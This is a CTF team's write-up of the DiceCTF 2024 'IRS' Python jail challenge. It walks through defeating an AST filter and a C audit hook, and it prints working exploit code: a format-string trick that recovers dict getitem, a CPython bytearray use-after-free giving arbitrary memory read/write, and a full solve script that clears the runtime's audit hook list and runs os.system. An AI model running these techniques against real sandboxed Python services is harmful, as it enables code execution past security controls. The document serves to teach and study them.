CTF Team at the University of British Columbia

[DiceCTF 2024] IRS

08 Feb 2024 by Lyndon and desp

Challenge

Author: kmh
Solves: 2

The Internal Restrictedpythonexecution Service has established a new automated auditing pipeline. Can you remain undetected?

nc mc.ax 31337

Attachments: irs.c irs audit.py build.sh run.sh Dockerfile

Analysis

We’re presented with the following audit.py file:

import ast
import irs

dangerous = lambda s: any(d in s for d in ("__", "attr"))
dangerous_attr = lambda s: dangerous(s) or s in dir(dict)
dangerous_nodes = (ast.Starred, ast.GeneratorExp, ast.Match, ast.With, ast.AsyncWith, ast.keyword, ast.AugAssign)

print("Welcome to the IRS! Enter your code:")
c = ""
while l := input("> "): c += l + "\n"
root = ast.parse(c)
for node in ast.walk(root):
    for child in ast.iter_child_nodes(node):
        child.parent = node
if not any(type(n) in dangerous_nodes or
           type(n) is ast.Name and dangerous(n.id) or
           type(n) is ast.Attribute and dangerous_attr(n.attr) or
           type(n) is ast.Subscript and type(n.parent) is not ast.Delete or
           type(n) is ast.arguments and (n.kwarg or n.vararg)
           for n in ast.walk(root)):
    del __builtins__.__loader__
    del __builtins__.__import__
    del __builtins__.__spec__
    irs.audit()
    exec(c, {}, {})

The server accepts a multi-line input through the variable c, and runs it through a series of checks to make sure the code isn’t dangerous. If all the checks pass, the input is executed as Python code via an exec.

In such “pyjail” challenges, the flag is usually stored somewhere on the filesystem, meaning we will likely need to obtain a shell or file read of some sort.

Analyzing the code further, we find that it uses the ast module to ban the following Python constructs:

Names and attributes containing __ or attr, meaning we can’t use the getattr() and setattr() built-ins
Attributes whose names are found in dir(dict)
*args and **kwargs in function parameters
Starred expressions - ast.Starred, and keyword arguments - ast.keyword
Subscript notation - ast.Subscript, with the exception of del a[b]
Generator expressions - ast.GeneratorExp
Match statements - ast.Match
With statements - ast.With/ast.AsyncWith
Augmented assignment - ast.AugAssign

In addition, the built-ins __loader__, __import__ and __spec__ are deleted prior to executing the program.

The last thing it does is run the C extension, irs.audit(). From the irs.c attachment given, we see that it adds an audit hook which causes the program to terminate upon triggering an audit event:

static int audit(const char *event, PyObject *args, void *userData) {
    static int running = 0;
    if (running) {
        exit(0);
    }
    if (!running && !strcmp(event, "exec")) running = 1;
    return 0;
}

static PyObject* irs_audit(PyObject *self, PyObject *args) {
    PySys_AddAuditHook(audit, NULL);
    Py_RETURN_NONE;
}

For some background, audit hooks were first introduced in Python 3.8 to, as quoted by PEP 578, “make actions taken by the Python runtime visible to auditing tools.” It’s intended to be used for logging applications, but as seen here, it also works as a sandboxing technique (although this is highly discouraged).

Getting past the audit hook

The first thing we learned is that audit hooks are not a joke. As in, they are a lot harder to bypass than one might suspect. There are some useful built-ins for jailbreaking, like breakpoint(), open() and exec(), but the audit blocks them all. It also blocks many standard library functions - especially shell functions like os.system.

There do exist some potentially dangerous library functions that the audit hook does not detect (such as ctypes), but in fact, imports are audited too! Only modules that have been loaded at runtime (a.k.a. those in sys.modules) do not trigger the audit event. We can import stuff like os and sys, but anything useful to get us an RCE is annoyingly out of reach.

Because of this, we initially considered the idea of constructing a custom code object and possibly pwning the process that way, but were immediately disappointed to discover that code.__new__ was banned too.

Despite its unintended usage, audit hooks were surprisingly effective here! Just getting past the audit hook was a challenge in and of itself.

Reading dict() items

Since it seems pretty challenging, let’s just deal with the audit hook later. If we can at least gain access the other loaded modules, that should widen the playing field of available functions to exploit.

The __ restriction doesn’t leave us with many options in this regard. The classic object.__subclasses__() trick is out, and so are plenty of the other useful dunder attributes. getattr() lets us read the attribute dynamically, but we’re not allowed to use a name containing attr.

Hmmm, well the built-in itself isn’t banned, so what if we just did globals()['__builtins__']['getattr']?

This bypasses both the attr and __ checks, but we’re also not allowed to use subscripts. Furthermore, any attribute whose name coincides with dir(dict) is blocked, so we can’t even use .get() or .pop() to get around that.

To our knowledge (and somewhat surprisingly!), there was no other way to obtain a dict entry. And banning ast.keyword meant we couldn’t do anything tricky like unpacking the dict as a keyword argument:

def f(attr=0, **kwargs):  # No ast.arguments either :(
    print(attr)
f(**globals())            # No ast.keyword

More futile attempts

Since the dict() path led us down a dead end, another idea we had was to abuse the properties of generator frames. Once we had a frame object, we could then use .f_back to trace it back all the way to the global scope. With some trickery with yield functions to bypass the ast.GeneratorExp condition, this seemed promising:

def f():
    global x, frame
    frame = x.gi_frame.f_back.f_back
    yield
x = f()
x.send(None)
print(frame)

However, when we ran the script, nothing printed out. After some confusion, we realized that the audit hook probably also banned generator frames! (yep, they did).

And well, even if they didn’t, the only useful attributes we can extract from the frame object are f_code (which is useless because code objects are banned), f_builtins (which returns a dict that we can’t access anyway), and f_globals (useless for the same reason as f_builtins).

Now, perhaps we could get some information from understanding why certain things were banned. The suspicious one was definitely the fact that del a[b] was allowed - the only case where we could use subscripts. However, we couldn’t find a use for it given that we can’t actually read the value that’s being deleted.

Another banned item was ast.Match. This time, we knew that it was because structural pattern matching could be abused to work as a getattr():

match object:
    case type(__subclasses__=subclasses):
        print(subclasses())

It would’ve been cool if the solution was based off this trick, but alas, the author was one step ahead of us.

The light at the end of the tunnel…?

Thinking back the generator trick and when we discovered that in Hack.lu CTF 2023’s Safest Eval, and the subsequent CVE we got for the unintended solution we used, we realized there is still another way we can potentially end up with an unusual getattr method - string.format.

Around the same time as our CVE, someone else also reported a format string vulnerability to RestrictedPython, in which attributes can be accessed by executing a format string:

subclasses = '{0.__subclasses__}'.format(object)

Originally, we thought that this is pretty useless for our case since it only allows information disclosure since it only returns the attribute as a string rather than the object itself, so we didn’t think much about it either, and continued to find more things to work with.

Digging up basically everything we learnt during the RestrictedPython adventures, we also came across another weird quirk of Python’s, namely the AttributeError.obj field, which can yield some really interesting results:

def getiter(seq):
    try:
        def hm():
            yield from seq
        g = hm()
        g.send(None)
        g.send(1)
    except AttributeError as e:
        return e.obj

This gives us an iterator for a sequence, without ever calling __iter__ or the builtin function iter(seq). It’s only ever-so-slightly useful for sandboxes like RestrictedPython which doesn’t even allow for loops if it was not explicitly allowed - we already have all the builtin methods we need, including iter in this challenge.

But then @nneonneo stepped in, combined them both, and gave us something much more than the sum of its parts:

try:
    "{__getitem__.xx}".format_map(vars(dict))
except Exception as e:
    getitem = e.obj

print(getitem({"a": 3}, "a"))

We can finally run getattr on arbitrary things! This means we can get the __getitem__ method out of dicts without getting blocked, and also means we can finally access basically everything we might ever need in the Python environment.

But… that’s just the Python environment. Remember how our audit hook lives in the interpreter itself? We can’t use any I/O operations without triggering the hook, and we also can’t import any of the aforementioned modules that could’ve let us bypass the audit hook restrictions either. We spent another few trying to see if there is any audit hook escapes within the things given to us that wouldn’t trigger the audit hook, such as those in the object subclasses path as usual, but nothing popped into our minds.

We were basically back to square one… or so we thought.

Falling to the dark side

At this point, we were getting desperate. So we, yes, resorted to our only option left: memory corruption.

One bug in particular, Issue #91153, was a Use-After-Free in bytearray.__index__. The interesting thing about this issue is that it was closed with a fix in 2022, but it still in fact works on the latest version! We can try out the PoC:

# uaf.py

class B:
    def __index__(self):
        global memory
        uaf.clear()
        memory = bytearray()
        uaf.extend([0] * 56)
        return 1

uaf = bytearray(56)
uaf[23] = B()
memory[id(250) + 24] = 100
print(250)

$ python3.12 uaf.py
100

The expected output is clearly 250, but it outputs 100 instead!

UAF exploit

It’s not immediately clear where the bug is, but we can make some reasonable assumptions from looking at the code. First, the __index__ method behaves a bit like a cast to an integer, meaning it coerces B() to a numeric value under certain circumstances (like assigning to a bytearray).

Therefore, the line that sets uaf[23] = B() actually means uaf[23] = 1, only the coercion is done during the assignment. This implies that something is happening between the time uaf[23] is assigned and the suspicious .clear()/.extend() code is executed, confusing the interpreter somehow.

For a better understanding of how the bug works, we must dig into the CPython source code:

/* Objects/bytearrayobject.c */

static int
bytearray_ass_subscript(PyByteArrayObject *self, PyObject *index, PyObject *values)
{
    Py_ssize_t start, stop, step, slicelen, needed;
    char *buf, *bytes;
    buf = PyByteArray_AS_STRING(self);

    if (_PyIndex_Check(index)) {
        Py_ssize_t i = PyNumber_AsSsize_t(index, PyExc_IndexError);

        if (i == -1 && PyErr_Occurred()) {
            return -1;
        }

        int ival = -1;

        // GH-91153: We need to do this *before* the size check, in case values
        // has a nasty __index__ method that changes the size of the bytearray:
        if (values && !_getbytevalue(values, &ival)) {
            return -1;
        }

        if (i < 0) {
            i += PyByteArray_GET_SIZE(self);
        }

        if (i < 0 || i >= Py_SIZE(self)) {
            PyErr_SetString(PyExc_IndexError, "bytearray index out of range");
            return -1;
        }

        if (values == NULL) {
            /* Fall through to slice assignment */
            start = i;
            stop = i + 1;
            step = 1;
            slicelen = 1;
        }
        else {
            assert(0 <= ival && ival < 256);
            buf[i] = (char)ival;
            return 0;
        }
    }
    ...
}

Let’s construct an execution timeline of what happens from start to end of the Python program (explanation by @nneonneo):

uaf is allocated as a bytearray with a 56-byte backing buffer.
uaf[23] = B() calls bytearray_ass_subscript(uaf, 23, B()).
buf = PyByteArray_AS_STRING(self); caches buf to point to the backing buffer.
_getbytevalue is called to turn B() into a byte, which invokes B.__index__.
B.__index__ clears uaf, which frees its backing buffer.
B.__index__ constructs a new bytearray called memory, which exactly occupies the memory of the freed backing buffer (still cached in buf).
B.__index__ extends uaf by 56 bytes so the size appears unchanged.
buf[i] = (char)ival; assigns 1 (B()’s return value) to index 23 of the freed buffer, overwriting memory’s size field, ob_size.
memory now has a NULL backing buffer (no buffer is initially allocated for an empty bytearray) with an absurd size field.

Thus, memory effectively becomes a buffer that stretches the entirety of virtual memory, allowing us to read/write to any arbitrary address.

uaf[id(250) + 24] = 100 simply makes use of the fact that small integers are cached in a small_ints[] array in memory, and reassigning offset 24 overwrites the value field of 250 to equal 100.

The code also includes a // GH-91153: comment of the bug fix. If we read it carefully, we realize that it does nothing to prevent this exploit from working, except forcing Step 7) so as to trick Python into thinking the bytearray hadn’t changed size.

This bug can easily be fixed by not caching buf.

Dark meets light

Now that we have the technicals out of the way for the UAF exploit, we should be ready to go, right? We just need to grab the PoC, tweak it a bit to edit the underlying audit hook implementation, and boom no more audit hooks for us.

But… notice the clear need of subscriptions in the PoC? It doesn’t work with any other methods - only __setitem__ and subscription can trigger the UAF, and both are banned in this challenge. We were briefly grief-stricken - until a second later when we remembered that we have arbitrary access to the Python object graph now.

We immediately went to work on the PoC, stringing together all of the exploits that we have figured out so far, and reached a point where we can call the UAF:

#UAF setup
try:
    "{__getitem__.xx}".format_map(vars(dict))
except Exception as e:
    global g
    g = e.obj
    gi = lambda o, k: g(dict(vars(o)), k)

baset = g(dict(vars(bytearray)), "__setitem__")
baget = g(dict(vars(bytearray)), "__getitem__")

class B:
    def __index__(self):
        global memory, uaf
        del uaf[:]
        memory = bytearray()
        uaf.extend([0] * 56)
        return 1

uaf = bytearray(56)
baset(uaf, 23, B())

#actual exploit
baset(memory, id(250) + 24, 100)
print(250)

…except the challenge exits without printing anything. We have been foiled yet again… or have we?

We know that using the repr of a custom function can yield us something like <function func at 0x000002459495F160>, which we can then parse and obtain the pointer (that is equivalent to the value given by id). But this doesn’t work with builtin methods nor literals, since they will just print something like <built-in function id> or 100 respectively. This is where codegolfing quirks come into play - turns out id.__init__, or (100).__new__ both yields the exact same pointer as it would by calling id(id) or id(100) respectively.

(Eventually we also realized object.__repr__(val) will print the pointer to any object just as id(val) would, but we were already using the above trick anyway so we didn’t bother moving over to that.)

After more brain racking (and brainfarting), we got to the point where we can throw sys.audit into oblivion and replace it with a benign function, like what we did for diligent auditor except with much more code and much more struggle:

#same UAF setup code as above, omitted for brevity
...

ga = g(g(globals(), "__builtins__"), "getattr")

subcls = g(dict(vars(type)), "__subclasses__")(object)   #metaclasses so need g
wc, = [cls for cls in subcls if 'wrap_close' in str(cls)]

glob = ga(gi(wc, "__init__"), "__globals__")
sys = g(glob, "sys")
print(glob.keys())
system = g(glob, "system")


aud = ga(sys.audit, "__init__")
print(aud)

def getptr(func):
    a, b = str(func).split("0x")
    a, b = b.split(">")
    print(a)
    return int(a, 16)

def nop():
    pass

baset(memory, getptr(aud) + 16, baget(memory, getptr(nop)))

system("sh")

But, as it seems to be the theme for this challenge, there are more hurdles to go over. Replacing sys.audit doesn’t let us do os.system, since os.system is implemented in C, and calls the equivalent function in the Python C API instead. We still have a lot of things we can try out since we have both arbitrary access both inside and outside of the Python environment - just that we need more knowledge on the Python interpreter internals.

Finally, harmony

One such knowledge is the difference between C level audit hooks (PySys_AddAuditHook, triggers on every audit event including those in sub-interpreters) and Python level audit hooks (sys.addaudithook, triggers on a per-interpreter basis). This is important because they dictate where the audit hook actually resides (_PyRuntime->audit_hooks vs PyInterpreterState->audit_hooks).

For our case, we only care about the _PyRuntime version since the audit hook is registered with the C API. This benefits us a fair bit - there is only one global _PyRuntime instance, and the data is written directly in the .PyRuntime segment. With some IDA referencing to get the offsets of libpython3.12.so (can’t believe I’m saying this on a pyjail writeup), we can obtain the audit_hook head easily, and NULL it out so that on firing audit event Python would think there is no hooks registered.

With that, we have finally obtained the full solve script (with convenient annotations for what each section is for, since you probably skipped through all of the explanations didn’t you 😢):

#leak dict getitem

try:
    "{__getitem__.xx}".format_map(vars(dict))
except Exception as e:
    global g
    g = e.obj
    gi = lambda o, k: g(dict(vars(o)), k)

#get basic get/set operators for bytearrays

baset = g(dict(vars(bytearray)), "__setitem__")
baget = g(dict(vars(bytearray)), "__getitem__")

#other useful helpers

sa = gi(dict, "__setitem__")
ga = g(g(globals(), "__builtins__"), "getattr")

def read_qword(mem, addr):
    global baget
    b = []
    for i in range(8):
        b.append(baget(mem, addr + i))
    return int.from_bytes(bytes(b), 'little')

#using repr, since we cant use id (it would trigger an audit event)
#fun trick: for funcs that say <built-in method x> instead of the one with ptr, use method.__init__ and it would return the same val as id(method)
#another fun trick: for interned objects its at <value>.__new__
#fwiw object.__repr__(<val>) also works for everything but that requires a func call so we cant use it purely with str.format
def getptr(func):
    a, b = str(func).split("0x")
    a, b = b.split(">")
    #print(a)
    return int(a, 16)

#uaf setup

class B:
    def __index__(self):
        global memory, uaf
        del uaf[:]
        memory = bytearray()
        uaf.extend([0] * 56)
        return 1

uaf = bytearray(56)
baset(uaf, 23, B())

#get sys module using typical _wrap_close.__init__.__globals__

subcls = g(dict(vars(type)), "__subclasses__")(object)   #metaclasses so need g
wc, = [cls for cls in subcls if 'wrap_close' in str(cls)]

glob = ga(gi(wc, "__init__"), "__globals__")
sys = g(glob, "sys")

#get a pointer in libpython3.12.so to get aslr base

aud = ga(sys.audit, "__init__")
print(aud)

audit_loc = getptr(aud) + 24  #sys.audit ptr to c func?  (EDIT: no its right after the func ptr of course i got lost :()

audit_ptr = read_qword(memory, audit_loc) #deref to where??
audit_ptr = read_qword(memory, audit_ptr + 24)  #no idea where i am at this point but from /proc/pid/maps it is in libpython3.12.so at unk_4BF320
print(hex(audit_ptr))

libpython_base = audit_ptr - 0x4BF320   #unk_4BF320

runtime = libpython_base + 0x5ACCC0   #.PyRuntime section

audit_hook_head = runtime + (383 * 8)  #`*((_QWORD *)&PyRuntime + 383) = v7;` which is `runtime->audit_hooks.head = entry;` of add_audit_hook_entry_unlocked inlined in PySys_AddAuditHook (PySys_Audit is way harder to read)

baset(memory, slice(audit_hook_head, audit_hook_head + 8), bytes([0]*8))   #use uaf to arb read/write to memory, in this case do `runtime->audit_hooks.head = NULL`

system = g(glob, "system")
system("ls -la")  #run system normally now that our audit hook linked list is cleared

(Please ignore the fact that some of these offsets lead to weird locations - it was 4am and we only cared enough to get the solve in, not whether it made sense or not, and not the fact that the offsets are so off due how the first offset was supposed to be + 16 not + 24 🤪👍)

Overall, this was a really fun pyjail challenge that utilized basically everything about Python in the challenge! Turns out while memory exploits were intended, getattr wasn’t intended and the intended solution was to use another UAF instead (Issue #43838). It was fun to see how others solved this differently, and definitely fun to have came up with a solution ourselves - but it’s probably safe to say this might just be enough ~~internet~~ Python for today. Or maybe at least another 3 CTFs or so.